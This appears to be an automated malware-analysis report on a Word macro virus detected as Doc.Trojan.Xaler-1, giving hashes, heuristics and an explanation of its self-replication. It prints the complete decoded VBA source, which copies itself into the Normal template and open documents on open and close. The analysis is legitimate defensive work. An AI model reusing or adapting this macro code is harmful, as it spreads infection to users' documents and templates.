Office (OLE) malware analysis — malicious · 090bc3f539c02fc2

MALICIOUS

Office (OLE)

793.0 KB Created: 2013-12-24 01:19:00 Authoring application: Microsoft Office Word First seen: 2015-09-18

MD5: 02077488c1ccd353dea4d2d5e93b6e90 SHA-1: c5d3fab46a5811239700401118f8f4f2fea4b446 SHA-256: 090bc3f539c02fc2d1b6a5d7dde6e830fca6c5c487c2460bc406e3d2c316f750

208 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains VBA macros that exhibit self-replication behavior. The `GOODSub` subroutine attempts to export the `ThisDocument` module to `C:\temp.tmp`, then reads it back and inserts it into the Normal template and the active document. This behavior is indicative of malware attempting to ensure its persistence or spread to other documents. The ClamAV detection of 'Doc.Trojan.Xaler-1' further supports the malicious nature of the file.

Heuristics 4

ClamAV: Doc.Trojan.Xaler-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Xaler-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2137 bytes
SHA-256: `e4b2065423dba39a917c28e5c6c32885d88c5e186631e9770f200b2a05d2bac3`
Detection ClamAV: Doc.Trojan.Xaler-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'RELAX Private Sub RELAX2() End End Sub Private Sub Document_Close() Call GOODSub Call RELAX2 End Sub Private Sub GOODSub() On Error Resume Next Application.ScreenUpdating = False Application.Options.SaveNormalPrompt = False x$ = "C:\temp.tmp" MacroContainer.VBProject.VBComponents.Item("ThisDocument").Export x$ Open x$ For Input As #1 keimeno = Input(LOF(1), 1) Close #1 kk& = InStr(1, keimeno, "'RELAX") keimeno = Right$(keimeno, Len(keimeno) - kk& + 1) For j = 1 To 2 If j = 1 Then NormalTemplate.VBProject.VBComponents.Item("ThisDocument").Export x$ Else ActiveDocument.VBProject.VBComponents.Item("ThisDocument").Export x$ End If Open x$ For Input As #1 rlx = Input(LOF(1), 1) Close #1 d1 = InStr(1, rlx, "'RELAX") If d1 = 0 Then If j = 1 Then NormalTemplate.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno NormalTemplate.Save Else ActiveDocument.VBProject.VBComponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno End If End If Next j '==================== Dim PRostasia As Byte PRostasia = 1 fff = FreeFile If Dir(ActiveDocument.FullName, 6) <> "" Then Open ActiveDocument.FullName For Binary As #fff Put #fff, 862, PRostasia Close #fff ActiveDocument.Save End If Kill x$ Application.ScreenUpdating = True End Sub Private Sub Document_Open() Call GOODSub End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.